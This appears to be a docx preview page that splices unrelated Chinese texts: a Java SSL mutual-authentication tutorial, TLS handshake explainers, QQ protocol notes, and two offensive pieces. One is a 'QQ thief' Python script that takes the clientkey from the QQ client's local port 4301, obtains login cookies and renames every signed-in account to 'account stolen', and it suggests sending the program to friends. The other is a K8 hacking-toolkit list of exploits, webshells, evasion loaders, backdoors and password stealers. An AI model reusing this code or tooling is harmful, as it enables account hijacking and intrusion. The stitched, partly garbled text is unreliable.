clientkey
- 格式:docx
- 大小:40.95 KB
- 文档页数:4
SSL双向认证java实现本文通过模拟场景,介绍SSL双向认证的java实现默认的情况下,我认为读者已经对SSL原理有一定的了解,所以文章中对SSL的原理,不做详细的介绍。
如果有这个需要,那么通过GOOGLE,可以搜索到很多这样的文章。
模拟场景:Server端和Client端通信,需要进行授权和身份的验证,即Client只能接受Server的消息,Server 只能接受Client的消息。
实现技术:JSSE(Java Security Socket Extension)是Sun为了解决在Internet上的安全通讯而推出的解决方案。
它实现了SSL和TSL(传输层安全)协议。
在JSSE中包含了数据加密,服务器验证,消息完整性和客户端验证等技术。
通过使用JSSE,开发人员可以在客户机和服务器之间通过TCP/IP协议安全地传输数据为了实现消息认证。
Server需要:1)KeyStore: 其中保存服务端的私钥2)Trust KeyStore:其中保存客户端的授权证书同样,Client需要:1)KeyStore:其中保存客户端的私钥2)Trust KeyStore:其中保存服务端的授权证书我们可以使用Java自带的keytool命令,去生成这样信息文件1)生成服务端私钥,并且导入到服务端KeyStore文件中keytool -genkey -alias serverkey -keystore kserver.keystore过程中,分别需要填写,根据需求自己设置就行keystore密码:123456名字和姓氏:stone组织单位名称:eulic组织名称:eulic城市或区域名称:HZ州或省份名称:ZJ国家代码:CNserverkey私钥的密码,不填写和keystore的密码一致:123456就可以生成kserver.keystore文件server.keystore是给服务端用的,其中保存着自己的私钥2)根据私钥,导出服务端证书keytool -export -alias serverkey -keystore kserver.keystore -file server.crtserver.crt就是服务端的证书3)将服务端证书,导入到客户端的Trust KeyStore中keytool -import -alias serverkey -file server.crt -keystore tclient.keystoretclient.keystore是给客户端用的,其中保存着受信任的证书采用同样的方法,生成客户端的私钥,客户端的证书,并且导入到服务端的Trust KeyStore中1)keytool -genkey -alias clientkey -keystore kclient.keystore2)keytool -export -alias clientkey -keystore kclient.keystore -file client.crt3)keytool -import -alias clientkey -file client.crt -keystore tserver.keystore如此一来,生成的文件分成两组服务端保存:kserver.keystore tserver.keystore客户端保存:kclient.keystore tclient.kyestore接下来,就采用JSSE,分别生成SSLServerSocket,SSLSocket服务端,生成SSLServerSocket代码SSLContext ctx = SSLContext.getInstance("SSL");KeyManagerFactory kmf = KeyManagerFactory.getInstance("SunX509"); TrustManagerFactory tmf = TrustManagerFactory.getInstance("SunX509");KeyStore ks = KeyStore.getInstance("JKS");KeyStore tks = KeyStore.getInstance("JKS");ks.load(new FileInputStream("data/kserver.keystore"), SERVER_KEY_STORE_PASSWORD .toCharArray());tks.load(new FileInputStream("data/tserver.keystore"), SERVER_TRUST_KEY_STORE_PA SSWORD.toCharArray());kmf.init(ks, SERVER_KEY_STORE_PASSWORD.toCharArray());tmf.init(tks);ctx.init(kmf.getKeyManagers(), tmf.getTrustManagers(), null);return (SSLServerSocket) ctx.getServerSocketFactory().createServerSocket(DEFAULT_PORT );客户端,生成SSLSocket的代码,大同小异SSLContext ctx = SSLContext.getInstance("SSL");KeyManagerFactory kmf = KeyManagerFactory.getInstance("SunX509");TrustManagerFactory tmf = TrustManagerFactory.getInstance("SunX509");KeyStore ks = KeyStore.getInstance("JKS");KeyStore tks = KeyStore.getInstance("JKS");ks.load(new FileInputStream("data/kclient.keystore"), CLIENT_KEY_STORE_PASSWORD.t oCharArray());tks.load(new FileInputStream("data/tclient.keystore"), CLIENT_TRUST_KEY_STORE_PAS SWORD.toCharArray());kmf.init(ks, CLIENT_KEY_STORE_PASSWORD.toCharArray());tmf.init(tks);ctx.init(kmf.getKeyManagers(), tmf.getTrustManagers(), null);return (SSLSocket) ctx.getSocketFactory().createSocket(DEFAULT_HOST, DEFAULT_PORT );如此,就完成了服务端和客户端之间的基于身份认证的交互。
SSLTLS安全握手协议SSL/TLS安全握手协议SSL(Secure Sockets Layer)和TLS(Transport Layer Security)是一种加密协议,用于保护网络通信的安全性。
安全握手协议是SSL/TLS的一部分,被用于建立安全通信连接的过程。
本文将详细介绍SSL/TLS安全握手协议的流程和原理。
一、安全握手协议概述安全握手协议在SSL/TLS通信过程中起到了核心的作用,它用于验证服务器的身份、协商加密算法和密钥,并建立安全通道。
只有经过安全握手协议的双方才能进行加密通信,有效防止数据被窃取或篡改。
二、握手协议流程1. ClientHello:客户端向服务器发送一个包含加密规范和随机数的消息,用于协商握手参数。
2. ServerHello:服务器接收到客户端的请求后,选择一个加密规范和生成自己的随机数,然后发送给客户端。
3. Certificate:服务器在此阶段发送其公钥证书给客户端,客户端通过验证证书的合法性来确认服务器的身份。
4. ServerKeyExchange(可选):在某些情况下,服务器还需要发送一些附加的信息给客户端,用于辅助密钥交换过程。
5. CertificateRequest(可选):如果服务器要求客户端进行身份验证,会向客户端发送一个请求,要求其发送客户端证书。
6. ServerHelloDone:服务器发送表示握手过程结束的消息。
7. ClientCertificate(可选):如果服务器发送了CertificateRequest 消息,客户端会返回自己的证书。
8. ClientKeyExchange:客户端使用服务器的公钥来加密一个用于之后通信的随机对称密钥,并发送给服务器。
9. CertificateVerify(可选):如果客户端发送了自己的证书,服务器需要验证其有效性。
10. ChangeCipherSpec:客户端和服务器通过此消息告知对方之后的通信将使用协商好的加密规范和密钥。
QQ⼤盗-巧⽤clientkey场景:1.将程序发给好友,好友打开 qq昵称就会被秒改为”账号已被盗“。
2.将程序运⾏在⾃⼰的电脑,让那些随意借⽤电脑看⽚聊天的室友产⽣⼀个觉悟:乱使⽤别⼈电脑很可能会泄露隐私。
思路:通过数据包模拟⽹页中的qq快速登录,拿到登录凭证(Cookie)修改qq昵称实现账号被盗的假象。
1、local_token:qq快速登录是基于qq的客户端实现的,qq客户端启动时会⽣成⼀个local_token(保存在本地的⼀个钥匙),通过local_token访问qq客户端的本地服务器(4301端⼝)可以获取到电脑上登录的所有qq账号。
2、clientkey:仅仅知道qq账号肯定是⽆法登录的,还要拿clientkey。
可以把clientkey理解成密码,qq客户端登录成功时会⽣成这个值,每个成功登录的账号都有⾃⼰的clientkey 相互匹配,只要拿到账号的clientkey就可以偷偷快速登录了。
3、cookies:前⾯两步其实都是在本地⽹络下完成的,验证于qq客户端的本地服务器。
现在提交uin+clientkey模拟快速登录是需要腾讯的远程服务器来验证的,验证通过就可以拿到登录凭证了(Cookies)。
4、ldw:通过前⼏步我们已经拿到登录凭证了,可以为所欲为访问腾讯所有web端的服务了,现在我想修改账号的昵称。
我选择了通过qq个⼈中⼼的⼀个接⼝修改昵称,这个接⼝需要⼀个ldw值,并不复杂,⼀个get请求就能拿到。
实现:以下使⽤python编程语⾔操作。
from urllib import requestfrom http import cookiejarimport jsonimport reopener=Nonecookie=Nonelocal_token=Nonejson_uins=Nonedef modNick(index,nick):clientuin=json_uins[index]['account']clientkey=Noneldw=None#拿到clientkeyurl = 'https://:4301/pt_get_st?clientuin='+clientuin+'&callback=ptui_getst_CB&r=0.810010167110566&pt_local_tk=' + local_tokenopener.open(url)for item in cookie:if ( == 'clientkey'):clientkey = item.valuebreak#登录url='https:///qqid?pt_clientver=5563&pt_src=1&keyindex=9&sid=5&ptlang=2052&clientuin='+clientuin+'&clientkey='+clientkeyopener.open(url)#拿到ldwurl="/cgi-bin/get_base_key?r=0.9431299830075388"opener.open(url)for item in cookie:if ( == 'ldw'):ldw = item.valuebreak#修改昵称url = '/cgi-bin/userinfo_mod'data = '&n=' + nick + '&ldw=' + ldwres = opener.open(url, bytes(data, 'utf-8'))data = res.read()if__name__=='__main__':#opener初始化cookie=cookiejar.CookieJar()opener=request.build_opener(request.HTTPCookieProcessor(cookie))opener.addheaders = [('Referer','https://')]#拿到local_tokenurl='https:///cgi-bin/xlogin?appid=1006102&daid=1&style=23&hide_border=1&proxy_url=http%3A%2F%%2Flogin%2Fproxy.html&s_url=/index.html' opener.open(url)for item in cookie:if( == 'pt_local_token'):local_token=item.valuebreak#拿到uinsurl='https://:4301/pt_get_uins?callback=ptui_getuins_CB&r=0.21624413130736064&pt_local_tk='+local_tokenres=opener.open(url)json_uins=json.loads(pile('var var_sso_uin_list=(.*?);').findall(str(res.read(),'utf-8'))[0])#修改昵称for index in range(0,len(json_uins)):modNick(index, '帐号已被盗!')最后说⼏句:改个昵称啥的都是⼩事情,拿到Cookies可以做到的事情太多了。
根据非对称密码学的原理,每个证书持有人都有一对公钥和私钥,这两把密钥可以互为加解密。
公钥是公开的,不需要保密,而私钥是由证书持人自己持有,并且必须妥善保管和注意保密。
数字证书则是由证书认证机构(CA)对证书申请者真实身份验证之后,用CA的根证书对申请人的一些基本信息以及申请人的公钥进行签名(相当于加盖发证书机构的公章)后形成的一个数字文件。
CA完成签发证书后,会将证书发布在CA的证书库(目录服务器)中,任何人都可以查询和下载,因此数字证书和公钥一样是公开的。
可以这样说,数字证书就是经过CA认证过的公钥,而私钥一般情况都是由证书持有者在自己本地生成的,由证书持有者自己负责保管。
具体使用时,签名操作是发送方用私钥进行签名,接受方用发送方证书来验证签名;加密操作则是用接受方的证书进行加密,接受方用自己的私钥进行解密。
因此,如果说数字证书是电子商务应用者的网上数字身份证话,那么证书相应的私钥则可以说是用户的私章或公章SSL由两个共同工作的协议组成:"SSL 记录协议"(SSL Record Protocol)和"SSL 握手协议"(SSL Handshake Protocol)。
SSL 记录协议建立在可靠的传输协议(如TCP)之上,为高层协议提供数据封装、压缩、加密等基本功能的支持;SSL 握手协议建立在SSL记录协议之上,用于在实际的数据传输开始前,通信双方进行身份认证、协商加密算法、交换加密密钥等。
SSL握手协议包含两个阶段,第一个阶段用于建立私密性通信信道,第二个阶段用于客户认证。
第一阶段是通信的初始化阶段,在此阶段,首先SSL要求服务器向浏览器出示证书;然后浏览器中的SSL软件发给服务器一个随机产生的传输密钥,此密钥由已验证过的公钥加密,随机产生的传输密钥是核心机密,只有客户的浏览器和此公司的Web服务器知道这个数字序列。
第二阶段的主要任务是对客户进行认证,此时服务器已经被认证了。
SSLTLS协议中的握手过程详解SSL/TLS协议中的握手过程详解SSL/TLS(安全套接层/传输层安全)协议是一种用于保护网络通信安全的加密协议。
在网络传输中,客户端和服务器之间的握手过程是建立安全通信的基础。
本文将详细解释SSL/TLS协议中的握手过程,以帮助读者更好地理解和应用该协议。
1. 握手协议介绍握手协议是SSL/TLS协议的重要组成部分,用于验证服务器的身份,并协商加密算法和密钥。
握手协议的主要目的是建立安全通道,确保通信的保密性、完整性和可信性。
2. 握手过程概述SSL/TLS握手过程包括以下步骤:2.1 客户端发送ClientHello在握手开始时,客户端向服务器发送ClientHello消息,包含了支持的SSL/TLS版本、加密算法和压缩方法等信息。
此消息允许服务器选择合适的参数进行后续握手协商。
2.2 服务器发送ServerHello服务器收到ClientHello消息后,选择合适的加密算法和相关参数,并向客户端发送ServerHello消息。
ServerHello消息包含服务器选择的SSL/TLS版本、加密算法和密钥等信息。
2.3 服务器发送Certificate服务器发送Certificate消息,将服务器的公钥证书发送给客户端。
客户端可以使用该证书验证服务器的身份,并获取服务器的公钥用于后续的密钥协商。
2.4 服务器发送ServerKeyExchange(可选)在某些情况下,服务器可能会发送ServerKeyExchange消息,用于向客户端发送临时公钥或其他参数,以供密钥协商使用。
这一步骤并非必需,只有在服务器需要向客户端提供额外信息时才会发送。
2.5 服务器发送ServerHelloDone服务器发送ServerHelloDone消息,通知客户端握手过程的结束。
客户端接收到该消息后,即可开始验证服务器的证书和进行密钥协商。
2.6 客户端发送ClientKeyExchange客户端生成一个随机的PreMaster Secret,并使用服务器的公钥加密,并将其发送给服务器,即ClientKeyExchange消息。
SSL消息按如下顺序发送:1.Client Hello客户发送服务器信息,包括它所支持的密码组。
密码组中有密码算法和钥匙大小;2.Server Hello服务器选择客户和服务器都支持的密码组到客户。
3.Certificate服务器发送一个证书或一个证书链到客户端,一个证书链开始于服务器公共钥匙证书并结束于证明权威的根证书。
这个消息是可选的,但服务器证书需要时,必须使用它。
4.Certificate request当服务器需要鉴别客户时,它发送一个证书请求到客户端。
在网络程序中,这个消息很少发送。
5.Server key exchange服务器当发送来的公共钥匙对钥匙交换不是很充分时,发送一个服务器钥匙交换消息。
6.Server hello done服务器告诉客户完成它的初始化流通消息。
7.Certificate假如服务器需要一个客户证书时,客户端发送一个证书链。
(只有在服务器需要客户证书时) 8.Client key exchange客户产生用于对称算法的一个钥匙。
对RSA客户用服务器公共钥匙加密这个钥匙信息并把它送到服务器。
9.Certificate verify在网络程序中,这个消息很少发送,它主要是用来允许服务器结束对客户的鉴别处理。
当用这个消息时,客户发送用密码函数的数字签名的信息到服务端,当服务端用公共钥匙解密这个消息时,服务器能够鉴别客户。
10.Change cipher spec客户发送一个消息告诉服务器改变加密模式。
11.Finished客户告诉服务器它已准备安全数据通信。
12.Change cipher spec服务器发送一个消息到客户端并告诉客户修改加密模式。
13.Finished服务器告诉客户端它已准备好安全数据通信。
这是client-server握手协议最后一步。
14.Encrypted data客户同服务器用对称加密算法和密码函数,并用客户发送到服务器的秘密钥匙加密通信。
K8⼯具集K8⼯具集⽐较全,底部有下载⽹址。
综合⼯具[+] 扫描⼯具 K8Cscan5.3 ⼤型内⽹渗透扫描器内置27个功能,⽀持Cobalt Strike[+] 综合⼯具 K8飞⼑Final.rar[+] K8data.mdb K8飞⼑漏洞数据库20190402[+] K8expList.txt K8飞⼑漏洞利⽤列表提权⼯具[+] 提权⼯具 CVE-2019-0803.exe Win32k漏洞提权⼯具[+] 提权⼯具 iislpe.exe IIS全版本提权(仅限IIS帐户、服务帐户)[+] 提权⼯具 pr.exe pr有参版 pr0⽆参版(巴西烤⾁:国内10年所说的PR或IIS6提权)[+] 提权⼯具 k8uac_20181125[K8].rar ⽬前还⽀持全版本WIN7-Win10[+] 提权⼯具 bypassUAC_Win7_10[K8team].rar 13还是15年?Win10打补丁失效[+] 提权⼯具 bypassUACexe_0419[K8].rar 13年的吧打补丁的WIN7好像不⽀持了[+] 提权⼯具 Lpk提权_K8.rar DLLHijack[+] 提权⼯具 Usp10提权_K8.rar DLLHijack[+] 提权⼯具 MS11-046.exe[+] 提权⼯具 MS11-080.exe[+] 提权⼯具 MS14-068 EXP域内提权神器.rar[+] 提权⼯具 MS15-010提权[K8team]_20150603.rar[+] 提权⼯具 MS15-051提权 CVE-2015-1701_20150525[K8].rar[+] 提权⼯具 MS15-077提权⼯具[K8].rar[+] 提权⼯具 MS16-016提权EXP[K8].rar[+] 提权⼯具 Windows Win32k.sys EPATHOBJ 0day Exploit 提权⼯具 [K8team].rar[+] 提权⼯具 k8downexec.mof[+] 提权⼯具 k8zzz.rar SMB溢出⽀持执⾏⾃定义exe程序[+] 提权⼯具 udf.dll MYSQL udf提权DLL[+] 提权⼯具 ws2help提权_K8.rar[+] 提权⼯具卡巴6.0.2.614提权.exe[+] 提权⼯具⼩红伞 Avira avipbb.sys 提权Exploit_1024[K8].rar[+] 提权⼯具提权Admin2SystemRun_0419[K8].rar[+] 提权⼯具提权GetTrustedInstaller_0419[K8].rar[+] 提权⼯具降权System2AdminRun_0419[K8].rar[+] 提权⼯具⽆NET添加⽤户提权_20140511[K8].rar[+] 提权⼯具 K8_VBS提权脚本免杀⽣成器.rar[+] 进程注⼊ DLL注⼊进程⼯具过UAC[+] 提权⼯具 NV显卡提权NVexploit.rar[+] 提权⼯具 net2.0day.exe[+] 提权⼯具 K8dllhijack.rar DLL却持测试⼯具[+] 提权⼯具 Invoke-MS16-032.ps1[+] Apache 2.2.1.4 mod_isapi exploit.rar漏洞利⽤[+] 漏洞利⽤ K8飞⼑-EXPLOIT内含20个程序EXP(Drupal、Joomla、Wordpress、Vbulletin、Xampp、Zimbra、ThinkPHP、Magento、Discuz)[+] 漏洞利⽤ K8_Struts2_EXP (S2-045、devMode、S2-037、S2-032、S2-020、S2-019、S2-016、S2-013、S2-009、S2-005)[+] 漏洞利⽤ cve-2019-0604 SharePoint RCE exploit[+] 漏洞利⽤ K8_JbossExp.exe Jboss Jmx-console exploit[+] 漏洞利⽤ K8 DotNetNuke DNNspot Store =3.0 GetShell exploit.rar[+] 漏洞利⽤ CVE-2018-2628 Weblogic GetShell EXPLOIT[+] 漏洞利⽤ ColdFusion 8 LFI EXP[+] 漏洞利⽤ K8_TomcatExp_1124[K.8].rar[+] 漏洞利⽤ WordPress 4.2 XSS 0day 20150429[K.8].rar[+] 漏洞利⽤ k8_zabbix_exp_20160820[K.8].rar漏洞利⽤[+] 漏洞利⽤ K8飞⼑-EXPLOIT内含20个程序EXP(Drupal、Joomla、Wordpress、Vbulletin、Xampp、Zimbra、ThinkPHP、Magento、Discuz)[+] 漏洞利⽤ K8_Struts2_EXP (S2-045、devMode、S2-037、S2-032、S2-020、S2-019、S2-016、S2-013、S2-009、S2-005)[+] 漏洞利⽤ K8 DotNetNuke DNNspot Store =3.0 GetShell exploit.rar[+] 漏洞利⽤ CVE-2018-2628 Weblogic GetShell EXPLOIT[+] 漏洞利⽤ ColdFusion 8 LFI EXP[+] 漏洞利⽤ K8_TomcatExp_1124[K.8].rar[+] 漏洞利⽤ WordPress 4.2 XSS 0day 20150429[K.8].rar[+] 漏洞利⽤ k8_zabbix_exp_20160820[K.8].rar漏洞利⽤[+] 漏洞利⽤ K8飞⼑-EXPLOIT内含20个程序EXP(Drupal、Joomla、Wordpress、Vbulletin、Xampp、Zimbra、ThinkPHP、Magento、Discuz)[+] 漏洞利⽤ K8_Struts2_EXP (S2-045、devMode、S2-037、S2-032、S2-020、S2-019、S2-016、S2-013、S2-009、S2-005)[+] 漏洞利⽤ K8 DotNetNuke DNNspot Store =3.0 GetShell exploit.rar[+] 漏洞利⽤ CVE-2018-2628 Weblogic GetShell EXPLOIT[+] 漏洞利⽤ ColdFusion 8 LFI EXP[+] 漏洞利⽤ K8_TomcatExp_1124[K.8].rar[+] 漏洞利⽤ WordPress 4.2 XSS 0day 20150429[K.8].rar[+] 漏洞利⽤ k8_zabbix_exp_20160820[K.8].rar[+] 漏洞利⽤ K8_Ecshop_Exploit[+] 漏洞利⽤ Magento 1.7.0.2 漏洞EXP_20150624[K.8].rar[+] 漏洞利⽤ K8COOKIE.rar Cookie注⼊⼯具[+] 漏洞利⽤ Jboss_invoke_Exp_k8.rar MSF脚本[+] 漏洞利⽤ DB_Owner_GetShell_K8.rar MSSQL DB权限拿SHELL⼯具挂马⼯具[+] 挂马⼯具 K8domainVBS.exe K8域控植⼊脚本⽣成器[+] 挂马⼯具 K8ARPTool.rar 内⽹ARP⼯具批量挂马[+] 挂马⼯具 CHM⽹马⽣成器.exe[+] 0day漏洞 K8飞⼑内置5个0day漏洞利⽤(Word漏洞\IE神洞\WVS\RAR)[+] 0day漏洞 [视频]BT5 MSF JAVA 0day CVE-2013-0422 Exploit Demo By K8team.rar[+] 0day漏洞 [视频]Hacking Team Flash 0day样本(Firefox IE)完美触发_20150707[K8].rar漏洞环境[+] 漏洞环境 K8-ASP注⼊漏洞环境.rar[+] 漏洞环境 k8bbs(php+mysql)注⼊漏洞环境.rar[+] 漏洞环境 K8 SQL强化练习⼯具V1.0_20190301[K8].rar[+] 漏洞环境 K8迷你ASP服务器.exe 绿⾊⼀键启动免杀⼯具[+] 免杀⼯具 scrunBase64 ShellCode免杀加载器(CS & MSF)[+] 免杀⼯具 scrunBase32 ShellCode免杀加载器(CS & MSF)[+] 免杀⼯具 scrun.exe & scrun.py ShellCode免杀加载器(CS & MSF)[+] 免杀⼯具 K8_SC_ENCODE(CS & Msf免杀⼯具).rar[+] 测试⼯具 K8shellcodeLoader.exe Shellcode测试[+] 免杀⼯具 K8随机免杀花指令⽣成器V2.0.exe[+] 免杀⼯具 K8数字签名添加器.exe[+] 捆绑⼯具 K8免杀系统⾃带捆绑器加强版V2.0.EXE远控后门[+] 远控后门 K8_Gh0st_Bin.rar 不免杀漏洞测试上线⽤[+] 远控后门 TeamServer.exe CS中转Win版,⽆需Kali下⽣成cobaltstrike.store⽂件[+] 远控后门 QQ远控 ClientKey 利⽤⼯具.rar 不免杀18年仍然可⽤19年未测估计也还⾏[+] 远控后门 vncdoor.exe VNC后门可正反向[+] 远控后门 k8_SSH_Manage.exe 渗透专⽤SSH(执⾏完后⽴即销毁会话,不像putty保存会话常暴露IP)[+] 连接⼯具 sshcmd.exe 渗透专⽤SSH(执⾏完后⽴即销毁会话,同时清除连接IP)[+] 连接⼯具 sshshell.exe 交互式SSH类似putty保持会话(⽬标显⽰IP⼀直连着)[+] 远控后门 K8⼿机远控电脑V1.1_20121020[K.8].rar[+] 远控后门 JspShellExec CMD下JSP⼀句话连接⼯具[+] 捆绑⼯具 K8_rarBind.rar RAR捆绑⼯具嗅探⼯具[+] 嗅探⼯具 K8getPC.py 内⽹存活主机探测(⽆需端⼝\⽆视防⽕墙)扫描⼯具[+] 扫描⼯具 K8Cscan5.0.rar ⼤型内⽹渗透扫描器内置22个功能,⽀持Cobalt Strike[+] 扫描⼯具 K8PortScan开源跨平台⼤型⽹络端⼝扫描器(Bin: Windows/Kali/SUSE)[+] 扫描插件 K8Cscan Moudle WebLogicScan.rar Weblogic通⽤GetShell[+] 扫描插件 K8Cscan Moudle CiscoScan.rar Cisco思科探测插件[+] 扫描插件 K8Cscan Moudle OSScan2.rar 系统版本探测插件2[+] 扫描插件 K8Cscan Moudle PortScan.cs 端⼝扫描插件源码[+] 扫描插件 K8Cscan Moudle FtpScan.rar Ftp密码扫描插件[+] 扫描插件 K8Cscan Moudle MysqlScan.rar Mysql密码扫描插件[+] 扫描插件 K8Cscan Moudle OnlinePC.rar 存活主机扫描插件[+] 扫描插件 K8Cscan Moudle WebBanner.rar WebBanner标题扫描插件[+] 扫描插件 K8Cscan Moudle WmiScan.rar Wmi扫描Win系统密码插件[+] 扫描⼯具 K8Cscan for SameWeb.rar C段旁站扫描⼯具[+] 扫描⼯具 K8Cscan for SubDomain.rar ⼦域名扫描⼯具[+] 扫描⼯具 cping3.0.rar ⼤型内外⽹渗透主机扫描⼯具[+] 扫描⼯具 K8_C段旁注⼯具6.0[+] 扫描⼯具 s加强版.exe[+] 扫描⼯具 K8openssl批量 Bat版.rar[+] 扫描⼯具 K8破壳SMTP Bat版.rar[+] 扫描⼯具 WPdetection.exe WordPress站点信息获取[+] 扫描⼯具 K8-S2批量.rar Struts2批量⼯具[+] 扫描⼯具 smbcheck.exe MS17-010漏洞检测,cping、cscan批量专⽤数据库[+] 脱库⼯具 K8mysqlCmd.rar Mysql数据库免驱连接⼯具[+] 脱库⼯具 K8_mysql脱裤20170114(千万).php[+] 脱库⼯具 K8Packwebshell.aspx 整站打包⼯具[+] 脱库⼯具 K8outSQL.aspx MSSQL导库⼯具加密解密[+] K8飞⼑⾥⼤量加密解密算法、编码解码、SQL注⼊、XSS等[+] 密码破解 SharpWeb.exe 浏览器帐密读取⼯具(Firefox/Chorme/IE)[+] 密码破解 laZagne.exe 本地密码检索⼯具(⽀持XP/2003)[+] 密码破解 sshtest.exe SSH密码登陆测试可结合Cscan进⾏批量破解[+] 嗅探⼯具 k8ftpsniffer.py FTP[+] 密码破解 K8_DNN_Password_Decrypt_20161110.rar dotnetnuke密码解密⼯具[+] 密码破解 Invoke-Mimikatz.ps1 Mimikatz 20181209[+] 密码破解 mz.exe Mimikatz-2.1.1-20181209 X86 ⼀键版[+] 密码破解 mz64.exe Mimikatz-2.1.1-20181209 X64 ⼀键版[+] 密码破解 K8_FTP爆破PHP脚本20151010.rar 内⽹渗透⽤[+] 密码破解 K8_Mysql爆破PHP脚本20151009.rar 内⽹渗透⽤[+] 密码破解 K8_ipcscan 爆破IPC⾃动种马⼯具+教程.rar[+] 密码破解 weblogic密码解密⼯具(exe & jar)[+] 密码破解 K8fuckVNC.rar k8vncpwd.exe VNC密码解密⼯具[+] 密码破解 K8getTeamViewPWD_20150705[K.8].rar[+] 密码破解 K8正⽅密码解密⼯具_20150801[K.8].rar[+] 密码破解 getBrowserPWD_1124[K.8].rar Firefox\Ghrome 浏览器密码读取⼯具[+] 密码破解 getvpnpwd.exe VPN、ADSL宽带帐密读取⼯具(仅限XP、2003)[+] 密码破解 GetPassword_x64.rar GetPwd_K8.rar ⼀键获取明⽂[+] 密码破解 K8_FuckOneShell ⼀句话密码爆破秒破10万[+] 加密解密 K8Base32_Decode_20161110.rar[+] 斛密⼯具 k8ungzip.exe GZIP ⽤于提取0day⽹马Powershell执⾏PAYLOAD[+] 密码破解 K8FTP密码破解器V2.0_20190301[K8].rar[+] 密码破解 K8Access数据库密码读取器_20190301[K8].rar[+] 加密⼯具 K8_FileHideImg.exe 任意⽂件隐藏⾄图⽚⼯具安全辅助[+] 安全⼯具 K8⽊马病毒后门监视器V3.0.rar 捆绑后门⽊马释放路径、Shell上传路径查看[+] 安全⼯具 K8进程拦截.rar (⽐⽅说访问⽹页浏览器调⽤外站EXE执⾏说明0day来了,⽽且可防⽌⽊马运⾏)[+] 安全⼯具 K8驱动防⽌WebShell提权⼯具.rar (就是说⽆法通过WEBSHELL执⾏任意命令,就算有签名的EXE也不⾏) [+] 辅助⼯具 K8注册表跳转.exe转发代理[+] 端⼝转发 PortTran.rar .NET端⼝转发⼯具[+] 端⼝转发 K8PortMap.exe D7端⼝映射⼯具WebShell[+] 转换⼯具 k8exe2bat.exe 任意⽂件转Bat⼯具(WebShell⽆法上传EXE解决⽅案)[+] 上传⼯具 K8upload_1125[K8].rar 新型⼩马上传⼯具⽀持任意⽂件(内置asp\php\jsp⼩马)[+] 连接⼯具 K8⼀句话ASP⽊马客户端加强程序版.exe[+] WebShell k8cmd.ascx[+] WebShell k8cmd.pl[+] WebShell k8cmd.py[+] WebShell k8飞⼑CMD.jsp[+] WebShell K8飞⼑A专⽤UA⼀句话⽊马.asp[+] WebShell K8飞⼑PHP-专⽤UA⼀句话⽊马.php[+] WebShell K8飞⼑专⽤UA⼀句话⽊马.asxp[+] WebShell shellcode.aspx硬件渗透[+]BadUSB K8飞⼑内含有⼤量Teensy渗透功能脚本⾃⾏研究[+]BadUSB Teensy 兼容所有Windows和Linux系统下载者.ino其它⼯具[+]教程录制 K8屏幕录像⾼压缩率版_20190301[K8].rar[+]系统美化 K8⽂件夹个性设置⼯具.exe[+]系统美化 K8个性桌⾯右键菜单.exe[+]搜索⼯具 K8吉他谱搜索⼯具_20190301[K8].rar[+]系统美化图标提取器.exe[+]系统美化 k8cmd.exe[+]辅助⼯具 K8侠盗猎车4外挂.exe[+]辅助⼯具 K8迅雷、快车、旋风地址互换⼯具.exe注意:只限学习使⽤切勿进⾏破坏。
TLS1.0协议TLS1.0 协议发布于1999年初。
该协议可在Internet中提供给通信双⽅⼀条私有信道,即对通信消息进⾏加密。
该协议主要描述了通信密钥协商的⽅法与通信格式的定义。
分别由TLS Handshake Protocol 和 TLS Record Protocol两个⼦协议进⾏描述。
虽然TLS1.0已经退出了历史舞台,但其最初的TLS设计核⼼过程并⽆太⼤变化。
因此有助于理解TLS协议的执⾏过程。
TCP协议为TLS协议提供传输层服务, TLS Record Protocol在TCP协议层之上,向上提供两种服务:1. 通信双⽅的连接是私有的。
通信过程时的数据加密⽅式采⽤对称加密。
对于每⼀条连接来说,都有其唯⼀的对称密钥。
⽤于加密数据的对称密钥是由TLS Handshake Protocol协商得到的。
在特殊情况下,TLS Record Protocol层的数据也可以不被加密。
2. 通信双⽅的连接是可靠的。
消息在传递过程中需要包含消息校验码(MAC),消息校验码采⽤Hash函数对消息进⾏摘要得出。
TLS Handshake Protocol提供密钥协商服务,该协议允许服务器与客户端相互验证对⽅⾝份、协商对称加密算法及对称密钥:1. 使⽤公钥加密体系对通信双⽅进⾏⾝份认证。
⾝份认证过程的参与者是可选的,但⾄少对其中⼀⽅进⾏验证。
2. 协商过程中的共享秘密是安全的。
协商秘密的过程中,攻击者难以通过截获协商过程中的数据,来推导出通信双⽅的共享秘密。
3. 协商过程是可信的。
攻击者不可能修改协商过程中的数据在TLS中,多数操作是需要消息MAC(消息认证码)来验证消息的真实性。
传统的消息认证码,仅仅是对消息进⾏Hash得以获取,因此易于攻击者对其进⾏伪造。
若通过对MAC⽣成过程中添加私有秘密的⽅法来⽣成消息认证码,伪造过程将⼗分困难(因为必须要猜出私有秘密)。
使⽤HMAC作为消息认证码。
HMAC的⽣成可以使⽤多种不同的Hash算法。
QQ协议体系概述1.QQ协议体系概述2. 请求登录令牌3. 登录4. 改变状态5. 得到好友列表6. 得到在线好友7. Keep Alive8. 得到用户资料9. 登出10. 查找用户QQ的协议非常庞大,这些做一些概述,要注意,不要认为下面的说法一定是对的,只能说目前看起来好像是这样:加密解密QQ的加密解密用的是TEA算法(puzzlebird的说法),不详细解释了。
QQ的包一般都是加密的(包头包尾除外),但是有个别包是不加密的,以后如果不做特别说明,则默认这个包是需要加密的。
此外,用什么密钥加密也有不同,不过基本上都是用会话密钥加密,以后如果不做特殊说明,表示是用会话密钥加密。
这里要注意一下,有时候你收到的包可能不是用会话密钥加密的,比如离线的消息。
你人都不在了,哪里来的会话密钥?所以服务器在你下次登录的时候,会把你还没收到过的消息用密码密钥加密再传给你。
这是一种特殊的情况,要分清楚。
UDP和TCPQQ支持UDP和TCP登录(如果使用HTTP代理,则相当于TCP登录),UDP登录没有什么好说的,TCP登录时,不管什么包的开头两字节都是包长度,这个长度包括了这两个字节。
包头包尾QQ协议有多种包头,每种包头都分别代表了一类用途的包,但是不是所有的包都有包尾,以下是一些存在的包头包尾格式参考包头包尾包头之后的固定格式说明0x00 无发送方QQ版本,或者是服务器版本,2字节随机密钥,1字节,如果这个字节是0x23,那么密钥就是0x,这个密钥用来加密发送者和接受者的QQ号。
加密算法: QQ号取反再与密钥异或发送者QQ号的加密形式,4字节接受者QQ号的加密形式,4字节0x00系列的包,用在文件传输过程中,传递控制信息。
也会出现在点对点通信中。
